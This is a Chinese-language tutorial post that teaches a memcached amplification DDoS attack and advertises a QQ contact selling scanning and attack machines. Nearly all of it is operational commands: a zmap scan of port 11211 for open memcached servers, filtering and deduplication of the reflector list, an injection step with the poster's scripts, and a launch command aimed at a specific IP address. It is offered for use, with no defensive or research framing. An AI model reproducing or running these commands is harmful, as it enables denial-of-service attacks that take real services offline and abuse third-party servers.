大家好，我是云賭，今天给大家说下memc攻击

首先先得拥有一台扫描机扫描攻击列表，表很重要

没有扫描机可以联系QQ3026378692咨询购买

购买后我们进行扫描，扫描得安装以下几个命令

测试服务器系统:centos 7 x 62位

# yum install epel-release

# yum install zmap -y

# yum install screen -y

# yum install php

# yum install php-memcache
安装以上5个命令后，进行扫描列表

扫描命令:screen zmap -p 11211 --probe-args=file:memcache_11211.pkt -o memc.txt -i 网卡  【有人会问网卡是什么，网卡就是连接ssh后，网速的上下行旁边的就是网卡，一般vps网卡是eth0】一般3小时扫完

扫完后就是过滤，我连过滤脚本全部打包好了

过滤脚本是memc123，上传服务器，再执行命令

过滤命令:./memc123 memc.txt 123.txt 80 100

过滤完后去重

去重命令:cat 123.txt | sort | uniq > me123.txt 

然后就到了注入的这一步，非常重要，我就讲细一点，大家慢慢理解，只要有脑子的话，可以看得明白

记得进去服务器后将我给你的东西全部上传至root目录

注入命令:php setup.php key me123.txt m1.txt 1 100

【有些人可能会问key是什么，key就是get值】

我的攻击脚本是yunduan 而我的key是yunduan

那么注入就是php setup.php yunduan me123.txt m1.txt 1 100

注入完就可以攻击了

攻击执行:./yunduan 117.27.239.0 80 me123.txt 1 -1 80 10

教程到此结束

需要扫描机 过滤机 发包机的联系QQ3026378692